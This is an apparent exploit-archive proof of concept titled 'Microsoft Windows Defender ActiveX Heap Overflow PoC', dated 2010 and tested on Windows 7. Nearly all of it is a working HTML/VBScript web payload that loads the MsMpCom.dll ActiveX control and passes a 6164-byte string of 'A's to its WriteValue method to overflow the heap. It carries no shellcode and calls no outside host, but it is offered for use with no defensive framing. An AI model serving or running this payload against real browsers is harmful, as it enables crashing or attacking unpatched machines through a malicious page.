#Aouther : [SarBoT511]
#Exploits title :[Microsoft Windows Defender ActiveX Heap Overflow PoC]
#downloads :[www.microsoft.com]
#Date : [2010/01/19]
#tested on :[windows 7]
#Microsoft Windows Defender

<html>
<object classid='clsid:07DD3249-A591-4949-8F20-09CD347C69DC' id='target' ></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Windows Defender\MsMpCom.dll"
prototype  = "Sub WriteValue ( ByVal bstrKeyName As String ,  ByVal bstrValueName As String ,  ByVal eType As _MP_COM_CONFIG_TYPE ,  ByVal varValue As Variant )"
memberName = "WriteValue"
progid     = "MpComExportsLib.MsMpSimpleConfig"
argCount   = 4
 
arg1=String(6164, "A")
arg2="defaultV"
arg3=1
arg4="defaultV"
 
target.WriteValue arg1 ,arg2 ,arg3 ,arg4 
 
</script>